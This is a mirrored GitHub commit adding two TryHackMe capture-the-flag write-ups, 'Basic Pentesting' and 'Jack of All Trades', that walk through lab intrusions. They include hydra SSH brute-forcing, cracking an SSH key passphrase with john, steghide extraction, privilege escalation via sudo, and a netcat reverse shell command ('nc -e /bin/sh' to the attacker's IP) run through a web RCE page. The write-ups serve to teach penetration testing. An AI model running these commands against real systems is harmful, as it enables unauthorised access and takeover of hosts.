mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-10 06:34:17 +00:00
Add files via upload
This commit is contained in:
parent
9327a54920
commit
f1b98508e2
2 changed files with 476 additions and 0 deletions
268
TryHackMe/Basic_pentesting.md
Normal file
268
TryHackMe/Basic_pentesting.md
Normal file
|
@ -0,0 +1,268 @@
|
|||
# TryHackMe-Basic Pentesting
|
||||
|
||||
>Abdullah Rizwan | 07:04 PM | 1st November , 2020
|
||||
|
||||
## NMAP
|
||||
|
||||
```
|
||||
|
||||
Nmap scan report for 10.10.207.136
|
||||
Host is up (0.17s latency).
|
||||
Not shown: 994 closed ports
|
||||
PORT STATE SERVICE VERSION
|
||||
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
|
||||
| ssh-hostkey:
|
||||
| 2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
|
||||
| 256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
|
||||
|_ 256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
|
||||
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|
||||
|_http-server-header: Apache/2.4.18 (Ubuntu)
|
||||
|_http-title: Site doesn't have a title (text/html).
|
||||
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
|
||||
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
|
||||
8009/tcp open ajp13?
|
||||
| ajp-methods:
|
||||
|_ Supported methods: GET HEAD POST OPTIONS
|
||||
8080/tcp open http-proxy
|
||||
| fingerprint-strings:
|
||||
| ms-sql-s, oracle-tns:
|
||||
| HTTP/1.1 400
|
||||
| Content-Type: text/html;charset=utf-8
|
||||
| Content-Language: en
|
||||
| Content-Length: 2243
|
||||
| Date: Sun, 01 Nov 2020 14:11:05 GMT
|
||||
| Connection: close
|
||||
| <!doctype html><html lang="en"><head><title>HTTP Status 400
|
||||
|_ Request</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font
|
||||
ily:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-c
|
||||
olor:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;
|
||||
color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name
|
||||
{color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><bod
|
||||
|_http-favicon: Apache Tomcat
|
||||
|_http-title: Apache Tomcat/9.0.7
|
||||
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/
|
||||
submit.cgi?new-service :
|
||||
SF-Port8080-TCP:V=7.80%I=7%D=11/1%Time=5F9EC1F9%P=x86_64-pc-linux-gnu%r(or
|
||||
SF:acle-tns,95F,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/html;charse
|
||||
SF:t=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x202243\r\nDate:\
|
||||
SF:x20Sun,\x2001\x20Nov\x202020\x2014:11:05\x20GMT\r\nConnection:\x20close
|
||||
SF:\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTTP\x20Sta
|
||||
SF:tus\x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20type=\"te
|
||||
SF:xt/css\">h1\x20{font-family:Tahoma,Arial,sans-serif;color:white;backgro
|
||||
SF:und-color:#525D76;font-size:22px;}\x20h2\x20{font-family:Tahoma,Arial,s
|
||||
SF:ans-serif;color:white;background-color:#525D76;font-size:16px;}\x20h3\x
|
||||
SF:20{font-family:Tahoma,Arial,sans-serif;color:white;background-color:#52
|
||||
SF:5D76;font-size:14px;}\x20body\x20{font-family:Tahoma,Arial,sans-serif;c
|
||||
SF:olor:black;background-color:white;}\x20b\x20{font-family:Tahoma,Arial,s
|
||||
SF:ans-serif;color:white;background-color:#525D76;}\x20p\x20{font-family:T
|
||||
SF:ahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}\x2
|
||||
SF:0a\x20{color:black;}\x20a\.name\x20{color:black;}\x20\.line\x20{height:
|
||||
SF:1px;background-color:#525D76;border:none;}</style></head><bod")%r(ms-sq
|
||||
SF:l-s,95F,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/html;charset=utf
|
||||
SF:-8\r\nContent-Language:\x20en\r\nContent-Length:\x202243\r\nDate:\x20Su
|
||||
SF:n,\x2001\x20Nov\x202020\x2014:11:05\x20GMT\r\nConnection:\x20close\r\n\
|
||||
SF:r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTTP\x20Status\x
|
||||
SF:20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20type=\"text/cs
|
||||
SF:s\">h1\x20{font-family:Tahoma,Arial,sans-serif;color:white;background-c
|
||||
SF:olor:#525D76;font-size:22px;}\x20h2\x20{font-family:Tahoma,Arial,sans-s
|
||||
SF:erif;color:white;background-color:#525D76;font-size:16px;}\x20h3\x20{fo
|
||||
:0{color:black;}\x20a\.name\x20{color:black;}\x20\.line\x20{height:1px;b
|
||||
SF:ackground-color:#525D76;border:none;}</style></head><bod");
|
||||
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel
|
||||
|
||||
Host script results:
|
||||
|_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
|
||||
|_nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|
||||
| smb-os-discovery:
|
||||
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|
||||
| Computer name: basic2
|
||||
| NetBIOS computer name: BASIC2\x00
|
||||
| Domain name: \x00
|
||||
| FQDN: basic2
|
||||
|_ System time: 2020-11-01T09:11:08-05:00
|
||||
| smb-security-mode:
|
||||
| account_used: guest
|
||||
| authentication_level: user
|
||||
| challenge_response: supported
|
||||
|_ message_signing: disabled (dangerous, but default)
|
||||
| smb2-security-mode:
|
||||
| 2.02:
|
||||
|_ Message signing enabled but not required
|
||||
| smb2-time:
|
||||
| date: 2020-11-01T14:11:08
|
||||
|_ start_date: N/A
|
||||
|
||||
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
|
||||
Nmap done: 1 IP address (1 host up) scanned in 167.02 seconds
|
||||
|
||||
```
|
||||
|
||||
## PORT 80
|
||||
|
||||
<img src="https://imgur.com/OLJ7xaK.png"/>
|
||||
|
||||
## PORT 8080
|
||||
|
||||
<img src="https://imgur.com/3V494fv.png"/>
|
||||
|
||||
## Smb Shares
|
||||
|
||||
Port 139 and 445 are open see lets see if we can access the samba shares
|
||||
|
||||
<img src="https://imgur.com/IT3LDqi.png"/>
|
||||
|
||||
<img src="https://imgur.com/EOVK7av.png"/>
|
||||
|
||||
From the `staff.txt` that we just grabbed , we can find two usernames `jan` and `kay`.
|
||||
|
||||
```
|
||||
Announcement to staff:
|
||||
|
||||
PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
|
||||
this is how mistakes happen. (This means you too, Jan!)
|
||||
|
||||
-Kay
|
||||
|
||||
```
|
||||
|
||||
## Gobuster
|
||||
|
||||
Running gobuster we can find a directory `/development`
|
||||
|
||||
```
|
||||
gobuster dir -u http://10.10.207.136/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
|
||||
===============================================================
|
||||
Gobuster v3.0.1
|
||||
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
|
||||
===============================================================
|
||||
[+] Url: http://10.10.207.136/
|
||||
[+] Threads: 10
|
||||
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
|
||||
[+] Status codes: 200,204,301,302,307,401,403
|
||||
[+] User Agent: gobuster/3.0.1
|
||||
[+] Timeout: 10s
|
||||
===============================================================
|
||||
2020/11/01 19:18:49 Starting gobuster
|
||||
===============================================================
|
||||
/development (Status: 301)
|
||||
Progress: 3698 / 220561 (1.68%)^C
|
||||
[!] Keyboard interrupt detected, terminating.
|
||||
===============================================================
|
||||
2020/11/01 19:20:02 Finished
|
||||
===============================================================
|
||||
|
||||
```
|
||||
|
||||
<img src="https://imgur.com/Q0ItoLg.png"/>
|
||||
|
||||
`j.txt`
|
||||
```
|
||||
For J:
|
||||
|
||||
I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
|
||||
and I was able to crack your hash really easily. You know our password policy, so please follow
|
||||
it? Change that password ASAP.
|
||||
|
||||
-K
|
||||
|
||||
```
|
||||
|
||||
`dev.txt`
|
||||
|
||||
```
|
||||
|
||||
2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
|
||||
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
|
||||
you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm
|
||||
using version 2.5.12, because other versions were giving me trouble. -K
|
||||
|
||||
2018-04-22: SMB has been configured. -K
|
||||
|
||||
2018-04-21: I got Apache set up. Will put in our content later. -J
|
||||
|
||||
```
|
||||
## Hydra
|
||||
|
||||
Now jan is the username we found and it has a weak password so lets bruteforce it using hydra and we know that there is ssh runnin on the box so,
|
||||
|
||||
```
|
||||
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.207.136
|
||||
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
|
||||
|
||||
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-11-01 19:27:32
|
||||
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
|
||||
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
|
||||
[DATA] attacking ssh://10.10.207.136:22/
|
||||
[STATUS] 176.00 tries/min, 176 tries in 00:01h, 14344223 to do in 1358:22h, 16 active
|
||||
|
||||
t[STATUS] 112.00 tries/min, 336 tries in 00:03h, 14344063 to do in 2134:32h, 16 active
|
||||
tt
|
||||
[22][ssh] host: 10.10.207.136 login: jan password: armando
|
||||
|
||||
```
|
||||
|
||||
<img src="https://imgur.com/FLDBsrg.png"/>
|
||||
|
||||
Visti kay's home directory and there you can read `.ssh/id_rsa` private key for logging into ssh , send and receive it through netcat
|
||||
|
||||
<img src="https://imgur.com/WDpCcKJ.png"/>
|
||||
|
||||
But we still cannot login because that `id_rsa` is password protected
|
||||
|
||||
<img src="https://imgur.com/1KZChBk.png"/>
|
||||
|
||||
Use `ssh2john` to get hash of `id_rsa` file
|
||||
|
||||
```
|
||||
root@kali:~/TryHackMe/Easy/BasicPentesting# /usr/share/john/ssh2john.py id_rsa > hash_for_id_rsa
|
||||
```
|
||||
Now run `john hash_for_id_rsa`
|
||||
|
||||
```
|
||||
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
|
||||
Proceeding with incremental:ASCII
|
||||
0g 0:00:00:56 3/3 0g/s 2748Kp/s 2748Kc/s 2748KC/s pigr3sr..pigr0ts
|
||||
0g 0:00:00:57 3/3 0g/s 2760Kp/s 2760Kc/s 2760KC/s jalyoun..jalyof4
|
||||
0g 0:00:00:58 3/3 0g/s 2772Kp/s 2772Kc/s 2772KC/s 1llgod..1llgu1
|
||||
0g 0:00:05:23 3/3 0g/s 2294Kp/s 2294Kc/s 2294KC/s fcp0luf..fcp0l46
|
||||
0g 0:00:05:24 3/3 0g/s 2297Kp/s 2297Kc/s 2297KC/s nadah76..nadahro
|
||||
0g 0:00:06:36 3/3 0g/s 2351Kp/s 2351Kc/s 2351KC/s gaudlsd..gaudsk3
|
||||
0g 0:00:07:21 3/3 0g/s 2381Kp/s 2381Kc/s 2381KC/s civlup42..civl12mt
|
||||
0g 0:00:07:22 3/3 0g/s 2384Kp/s 2384Kc/s 2384KC/s adiskak2..adiskuas
|
||||
0g 0:00:09:14 3/3 0g/s 2527Kp/s 2527Kc/s 2527KC/s cornsexice..cornsexto1
|
||||
0g 0:00:09:15 3/3 0g/s 2528Kp/s 2528Kc/s 2528KC/s cujkdc1..cujkdd4
|
||||
0g 0:00:09:16 3/3 0g/s 2530Kp/s 2530Kc/s 2530KC/s bslhmf6..bslhm82
|
||||
0g 0:00:09:17 3/3 0g/s 2532Kp/s 2532Kc/s 2532KC/s psyctiu..psyct29
|
||||
0g 0:00:09:18 3/3 0g/s 2534Kp/s 2534Kc/s 2534KC/s tr00ge1..tr00gak
|
||||
0g 0:00:09:19 3/3 0g/s 2536Kp/s 2536Kc/s 2536KC/s kmdufs1..kmduf6q
|
||||
0g 0:00:12:52 3/3 0g/s 2458Kp/s 2458Kc/s 2458KC/s ecicos7..ecicots
|
||||
0g 0:00:12:53 3/3 0g/s 2460Kp/s 2460Kc/s 2460KC/s eussce7..eussc14
|
||||
0g 0:00:12:54 3/3 0g/s 2461Kp/s 2461Kc/s 2461KC/s exxza8f..exxzay!
|
||||
0g 0:00:12:55 3/3 0g/s 2463Kp/s 2463Kc/s 2463KC/s eevzco5..eevzcuk
|
||||
0g 0:00:12:56 3/3 0g/s 2464Kp/s 2464Kc/s 2464KC/s ublhl..ublni
|
||||
0g 0:00:12:57 3/3 0g/s 2466Kp/s 2466Kc/s 2466KC/s 0zjnhb..0zjnd4
|
||||
0g 0:00:12:58 3/3 0g/s 2467Kp/s 2467Kc/s 2467KC/s l4zb3n..l4zpay
|
||||
0g 0:00:12:59 3/3 0g/s 2469Kp/s 2469Kc/s 2469KC/s hfu71s..hfu706
|
||||
0g 0:00:13:01 3/3 0g/s 2471Kp/s 2471Kc/s 2471KC/s 4s18le..4s18cw
|
||||
0g 0:00:13:02 3/3 0g/s 2473Kp/s 2473Kc/s 2473KC/s mcjau03..mcjau25
|
||||
0g 0:00:13:03 3/3 0g/s 2474Kp/s 2474Kc/s 2474KC/s cim0cno..cim0c11
|
||||
beeswax (id_rsa)
|
||||
|
||||
```
|
||||
<img src="https://imgur.com/z0d6Xi2.png"/>
|
||||
|
||||
Now to become root we can run ALL commands
|
||||
|
||||
```
|
||||
Matching Defaults entries for kay on basic2:
|
||||
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
|
||||
|
||||
User kay may run the following commands on basic2:
|
||||
(ALL : ALL) ALL
|
||||
kay@basic2:~$
|
||||
|
||||
```
|
||||
so `sudo bash`
|
||||
|
||||
|
||||
<img src="https://imgur.com/SYNGX9N.png"/>
|
208
TryHackMe/Jack_of_All_Trades.md
Normal file
208
TryHackMe/Jack_of_All_Trades.md
Normal file
|
@ -0,0 +1,208 @@
|
|||
# TryHackMe-Jack Of All Trades
|
||||
|
||||
>Abdullah Rizwan | 08:17 PM , 1st November 2020
|
||||
|
||||
## NMAP
|
||||
|
||||
```
|
||||
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-01 20:18 PKT
|
||||
Nmap scan report for 10.10.103.231
|
||||
Host is up (0.18s latency).
|
||||
Not shown: 998 closed ports
|
||||
PORT STATE SERVICE VERSION
|
||||
22/tcp open http Apache httpd 2.4.10 ((Debian))
|
||||
|_http-server-header: Apache/2.4.10 (Debian)
|
||||
|_http-title: Jack-of-all-trades!
|
||||
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
|
||||
80/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
|
||||
| ssh-hostkey:
|
||||
| 1024 13:b7:f0:a1:14:e2:d3:25:40:ff:4b:94:60:c5:00:3d (DSA)
|
||||
| 2048 91:0c:d6:43:d9:40:c3:88:b1:be:35:0b:bc:b9:90:88 (RSA)
|
||||
| 256 a3:fb:09:fb:50:80:71:8f:93:1f:8d:43:97:1e:dc:ab (ECDSA)
|
||||
|_ 256 65:21:e7:4e:7c:5a:e7:bc:c6:ff:68:ca:f1:cb:75:e3 (ED25519)
|
||||
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
|
||||
|
||||
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
|
||||
Nmap done: 1 IP address (1 host up) scanned in 46.76 seconds
|
||||
|
||||
```
|
||||
|
||||
## PORT 22
|
||||
|
||||
Noramlly this is default port 22 but in this case it is http if you visit it on firefox it has restricted default ports like ssh , ftp and etc so inorder to enable we have to go to browser's `about:config` and a property to override theses settings
|
||||
|
||||
https://support.mozilla.org/en-US/questions/1083282
|
||||
|
||||
<img src="https://imgur.com/rzMq2ks.png"/>
|
||||
|
||||
|
||||
<img src="https://imgur.com/s6O5rAh.png"/>
|
||||
|
||||
|
||||
And we can access the page now
|
||||
|
||||
<img src="https://imgur.com/LdntB1r.png"/>
|
||||
|
||||
By looking at the source code
|
||||
|
||||
<img src="https://imgur.com/xb0DMC4.png"/>
|
||||
|
||||
We can find two things `/recovery.php` and a base64 encoded text
|
||||
|
||||
|
||||
On decoding the text
|
||||
|
||||
```
|
||||
Remember to wish Johny Graves well with his crypto jobhunting! His encoding systems are amazing! Also gotta remember your password: u?WtKSraq
|
||||
```
|
||||
|
||||
user name john maybe
|
||||
|
||||
|
||||
Download those images
|
||||
|
||||
<img src="https://imgur.com/B8Yflc3.png"/>
|
||||
|
||||
|
||||
<img src="https://imgur.com/mFfLM5F.png"/>
|
||||
|
||||
By looking at the source code and login with `Jack` and `u?WtKSraq`
|
||||
|
||||
```
|
||||
GQ2TOMRXME3TEN3BGZTDOMRWGUZDANRXG42TMZJWG4ZDANRXG42TOMRSGA3TANRVG4ZDOMJXGI3DCNRXG43DMZJXHE3DMMRQGY3TMMRSGA3DONZVG4ZDEMBWGU3TENZQGYZDMOJXGI3DKNTDGIYDOOJWGI3TINZWGYYTEMBWMU3DKNZSGIYDONJXGY3TCNZRG4ZDMMJSGA3DENRRGIYDMNZXGU3TEMRQG42TMMRXME3TENRTGZSTONBXGIZDCMRQGU3DEMBXHA3DCNRSGZQTEMBXGU3DENTBGIYDOMZWGI3DKNZUG4ZDMNZXGM3DQNZZGIYDMYZWGI3DQMRQGZSTMNJXGIZGGMRQGY3DMMRSGA3TKNZSGY2TOMRSG43DMMRQGZSTEMBXGU3TMNRRGY3TGYJSGA3GMNZWGY3TEZJXHE3GGMTGGMZDINZWHE2GGNBUGMZDINQ=
|
||||
```
|
||||
This is base32 encoded text on decoding it
|
||||
|
||||
<img src="https://imgur.com/PNwkLcw.png"/>
|
||||
|
||||
```
|
||||
45727a727a6f72652067756e67206775722070657271726167766e79662067622067757220657270626972656c207962747661206e657220757671717261206261206775722075627a72636e7472212056207861626a2075626a20736265747267736879206c6268206e65722c20666220757265722766206e20757661673a206f76672e796c2f3247694c443246
|
||||
```
|
||||
|
||||
Now this is hex text on decoding it
|
||||
|
||||
<img src="https://imgur.com/hInfNdO.png"/>
|
||||
|
||||
```
|
||||
Erzrzore gung gur perqragvnyf gb gur erpbirel ybtva ner uvqqra ba gur ubzrcntr! V xabj ubj sbetrgshy lbh ner, fb urer'f n uvag: ovg.yl/2GiLD2F
|
||||
```
|
||||
|
||||
This is ROT 13 (Shift Cipher)
|
||||
|
||||
<img src="https://imgur.com/WmKeBxZ.png"/>
|
||||
|
||||
```
|
||||
Remember that the credentials to the recovery login are hidden on the homepage! I know how forgetful you are, so here's a hint: bit.ly/2TvYQ2S
|
||||
```
|
||||
|
||||
On visiting the link
|
||||
|
||||
<img src="https://imgur.com/WPPtesd.png"/>
|
||||
|
||||
Now its says about `Stegosauria` , now we recently downloaded two images on our machines ,so that dinosaur one looks interesting on using `steg hide --extract -sf [image.jpg]`
|
||||
|
||||
<img src="https://imgur.com/D8Dp9o2.png"/>
|
||||
|
||||
<img src="https://imgur.com/HL9DDof.png"/>
|
||||
|
||||
So this a rabbithole , lets steghide on different image , the second `jackinthebox.jpg` also didn't worked but when grabbed the `header.jpg` it worked
|
||||
|
||||
<img src="https://imgur.com/SNAzsSc.png"/>
|
||||
|
||||
```
|
||||
Username: jackinthebox
|
||||
Password: TplFxiSHjY
|
||||
```
|
||||
However this is not the credentials for SSH
|
||||
|
||||
<img src="https://imgur.com/vYObw7r.png"/>
|
||||
|
||||
Now this is a RCE execution we can run a reverse shell here
|
||||
|
||||
```
|
||||
nc -e /bin/sh 10.14.3.143 4444
|
||||
|
||||
```
|
||||
You can run any reverse shell you want but `netcat` one worked so lets roll with it
|
||||
|
||||
<img src="https://imgur.com/bXY0z0b.png"/>
|
||||
|
||||
Now we are `www-data` can't run really do much so lets try to elevate our privileges,so lets enumerate the machine , upload `linepeas`
|
||||
|
||||
<img src="https://imgur.com/1bwVyii.png"/>
|
||||
|
||||
Linpeas didn't find anyhting useful so there is a file in `~` home directory `jacks_password_list`
|
||||
|
||||
<img src="https://imgur.com/j95luIi.png"/>
|
||||
|
||||
## Hydra
|
||||
|
||||
Now we need to specify the port number becasue it's not on port 22
|
||||
|
||||
```
|
||||
hydra -s 80 -l jack -P password_list.txt ssh://10.10.103.231 -V
|
||||
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
|
||||
|
||||
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-11-01 21:49:48
|
||||
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
|
||||
[DATA] max 16 tasks per 1 server, overall 16 tasks, 24 login tries (l:1/p:24), ~2 tries per task
|
||||
[DATA] attacking ssh://10.10.103.231:80/
|
||||
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "*hclqAzj+2GC+=0K" - 1 of 24 [child 0] (0/0)
|
||||
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "eN<A@n^zI?FE$I5," - 2 of 24 [child 1] (0/0)
|
||||
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "X<(@zo2XrEN)#MGC" - 3 of 24 [child 2] (0/0)
|
||||
[ATTEMPT] target 10.10.103.231 - login "jack" - pass ",,aE1K,nW3Os,afb" - 4 of 24 [child 3] (0/0)
|
||||
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "ITMJpGGIqg1jn?>@" - 5 of 24 [child 4] (0/0)
|
||||
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "0HguX{,fgXPE;8yF" - 6 of 24 [child 5] (0/0)
|
||||
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "sjRUb4*@pz<*ZITu" - 7 of 24 [child 6] (0/0)
|
||||
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "[8V7o^gl(Gjt5[WB" - 8 of 24 [child 7] (0/0)
|
||||
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "yTq0jI$d}Ka<T}PD" - 9 of 24 [child 8] (0/0)
|
||||
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "Sc.[[2pL<>e)vC4}" - 10 of 24 [child 9] (0/0)
|
||||
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "9;}#q*,A4wd{<X.T" - 11 of 24 [child 10] (0/0)
|
||||
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "M41nrFt#PcV=(3%p" - 12 of 24 [child 11] (0/0)
|
||||
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "GZx.t)H$&awU;SO<" - 13 of 24 [child 12] (0/0)
|
||||
[ATTEMPT] target 10.10.103.231 - login "jack" - pass ".MVettz]a;&Z;cAC" - 14 of 24 [child 13] (0/0)
|
||||
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "2fh%i9Pr5YiYIf51" - 15 of 24 [child 14] (0/0)
|
||||
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "TDF@mdEd3ZQ(]hBO" - 16 of 24 [child 15] (0/0)
|
||||
[ATTEMPT] target 10.10.103.231 - login "jack" - pass "v]XBmwAk8vk5t3EF" - 17 of 25 [child 13] (0/1)
|
||||
[80][ssh] host: 10.10.103.231 login: jack password: ITMJpGGIqg1jn?>@
|
||||
1 of 1 target successfully completed, 1 valid password found
|
||||
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-11-01 21:49:54
|
||||
|
||||
```
|
||||
|
||||
<img src="https://imgur.com/aT4gtfl.png"/>
|
||||
|
||||
Using netcat to get that image on our local machine
|
||||
|
||||
<img src="https://imgur.com/DgS4vMh.png"/>
|
||||
|
||||
<img src="https://imgur.com/agCAuvB.png"/>
|
||||
|
||||
This is our user flag
|
||||
|
||||
Check for SUID
|
||||
|
||||
```
|
||||
|
||||
jack@jack-of-all-trades:~$ find / -perm /4000 2>/dev/null
|
||||
/usr/lib/openssh/ssh-keysign
|
||||
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
|
||||
/usr/lib/pt_chown
|
||||
/usr/bin/chsh
|
||||
/usr/bin/at
|
||||
/usr/bin/chfn
|
||||
/usr/bin/newgrp
|
||||
/usr/bin/strings
|
||||
/usr/bin/sudo
|
||||
/usr/bin/passwd
|
||||
/usr/bin/gpasswd
|
||||
/usr/bin/procmail
|
||||
/usr/sbin/exim4
|
||||
/bin/mount
|
||||
/bin/umount
|
||||
/bin/su
|
||||
jack@jack-of-all-trades:~$
|
||||
```
|
||||
|
||||
<img src="https://imgur.com/xWUCjwT.png"/>
|
||||
|
Loading…
Reference in a new issue